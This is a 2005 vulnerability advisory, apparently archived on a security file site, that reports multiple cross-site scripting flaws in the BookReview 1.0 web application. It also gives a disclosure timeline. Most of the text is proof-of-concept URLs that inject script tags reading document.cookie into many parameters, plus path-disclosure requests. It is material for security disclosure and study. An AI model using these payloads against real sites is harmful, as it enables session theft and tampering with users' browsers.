exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

bookreviewXSS.txt

bookreviewXSS.txt
Posted Aug 14, 2005
Authored by Lostmon

BookReview 1.0 is susceptible to multiple cross site scripting flaws.

tags | exploit, xss
SHA-256 | 18b1301ed5452fdb6ef81f18d76a51f4d9525dfc0f5a7e56dfda44f95f976cf7

bookreviewXSS.txt

Change Mirror Download
###################################################
BookReview 1.0 multiple variable XSS
vendor url:http://www.readersunite.com
advisore:http://lostmon.blogspot.com/2005/05/
bookreview-10-multiple-variable-xss.html
vendor notify: yes exploit available: yes
###################################################

BookReview contains a flaw that allows a remote cross
site scripting attack.This flaw exists because the
application does not validate multiple variables upon
submission to multiple scripts.This could allow a user
to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust
relationship between the browser and the server,
leading to a loss of integrity.



############
versions:
############

BookReview beta 1.0 vulnerable.


##############
solution
##############

no solutions was available at this time


###########
timeline
###########

discovered: 27 april 2005
vendor notify 17 may 2005 (webform)
disclosure: 26 may 2005



##################
proof of concepts
###################
all files are submitted to 'index.php' script by variable 'page' like
index.php?page=[NAME_OF_MODULE]&isbn=[NUMBER_OF_ISBN]
the name of module can be 'add_review' 'add_contents' or others

for example this url:
http://[victim]/index.php?page=add_contents&isbn=083081423X&chapters=25

is the same of this :

http://[victim]/add_contents&isbn=083081423X&chapters=25

with this if you think we have two ways for exploiting this situation
, one with the index.php and other directly by the module.

##################
add_review.htm
#################

http://[victim]/add_review.htm?isbn=0801052319&node=%3Cscript%3Ealert(document.cookie)%3C/script%3E&review=true

http://[victim]/add_review.htm?isbn=0801052319%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&node=Political_Science&review=true

http://[victim]/add_review.htm?isbn=0553278223&node="><script>alert(document.cookie)</script>&review=true

http://[victim]/add_review.htm?node=index&isbn=\\"><script>alert(document.cookie)</script>

###################
index.php
###################

http://[victim]/index.php?page=add_contents&isbn=083081423X%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&chapters=25

http://[victim]/index.php?page=add_contents&isbn=083081423X&chapters=25%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

NICE ERROR !!


; function tallyup() { var count = 0; var book = 0; var part = 0; var
section = 0; var chapter = 0; var appendix = 0; var main_prefix = "";
var section_prefix = ""; for ( i=0; i var persian = '' + value; var
roman=""; var ronumdashes=""; var buffer=10-persian.length; while
(buffer>0) {persian="0"+persian;buffer--} var units=new
Array("","I","II","III","IV","V","VI","VII","VIII","IX"); var tens=new
Array("","X","XX","XXX","XL","L","LX","LXX","LXXX","XC"); var
hundreds=new Array("","C","CC","CCC","CD","D","DC","DCC","DCCC","CM");
var thousands=new
Array("","M","MM","MMM","MV","V","VM","VMM","VMMM","MX"); var
billionsdashes=new
Array("","=","==","===","==","=","==","===","====","==");
romandashes=billionsdashes[persian.substring(0,1)]; var
hundredmillionsdashes=new
Array("","=","==","===","==","=","==","===","====","==");
romandashes+=hundredmillionsdashes[persian.substring(1,2)]; var
tenmillionsdashes=new
Array("","=","==","===","==","=","==","===","====","==");
romandashes+=tenmillionsdashes[persian.substring(2,3)]; var
millionsdashes=new
Array("","_","__","___","_=","=","=_","=__","=___","_=");
romandashes+=millionsdashes[persian.substring(3,4)]; var
hundredthousandsdashes=new
Array("","_","__","___","__","_","__","___","____","__");
romandashes+=hundredthousandsdashes[persian.substring(4,5)]; var
tenthousandsdashes=new
Array("","_","__","___","__","_","__","___","____","__");
romandashes+=tenthousandsdashes[persian.substring(5,6)]; var
thousandsdashes=new Array("","","",""," _","_","_","_","_"," _");
romandashes+=thousandsdashes[persian.substring(6,7)];
roman=thousands[persian.substring(0,1)];
roman+=hundreds[persian.substring(1,2)];
roman+=tens[persian.substring(2,3)];
roman+=thousands[persian.substring(3,4)];
roman+=hundreds[persian.substring(4,5)];
roman+=tens[persian.substring(5,6)];
roman+=thousands[persian.substring(6,7)];
roman+=hundreds[persian.substring(7,8)];
roman+=tens[persian.substring(8,9)];
roman+=units[persian.substring(9,10)]; return roman; } function
alphabetise(number) { return String.fromCharCode(64+number); } ///
function submitconfirm() { var agree =
document.getElementById('agree'); if ( !agree.checked ) { alert("You
must indicate your agreement to the terms and conditions by checking
the box provided."); return false; } return true; }


###################
add_contents.htm
###################


http://[victim]/add_contents.htm?isbn=083081423X%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/suggest_category.htm?node=Agriculture%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/contact.htm?user=admin%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/add_booklist.htm?node=Agriculture_and_Aquaculture%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E


#########################
others.
#########################

http://[victim]/add_url.htm?node=%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://[victim]/search.htm?page=search&submit%5Bstring%5D=%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=Ok&submit%5Btype%5D=author

http://[victim]/add_classification.htm?isbn=0830815961%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&node=Gospels

http://[victim]/suggest_review.htm?node=Business_and_Economics"><SCRIPT>alert()</SCRIPT>

############################
posible local fle inclusion
############################

http://[victim]/suggestions/"><script>alert(document.cookie)</script>.htm
http://[victim]/directory/">%3Cscript%3Ealert(document.cookie)%3C/script%3E.htm

http://[victim]/search.htm?page=search&submit%5Bstring%5D=%5C%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=Ok&submit%5Btype%5D=author



################
path disclosure:
################

http://[victim]/search.htm?page=search&submit%5Bstring%5D=&submit=Ok&submit%5Btype%5D=auth
or

http://[victim]/search.htm?page=search&submit%5Bstring%5D=&submit%5Btype%5D=title


######################## €nd ########################

thnx to estrella to be my ligth
Thnx to icaro he is my Shadow !!!
thnx to all http://www.osvdb.org Team
thnx to all who day after day support me !!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
La curiosidad es lo que hace mover la mente
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close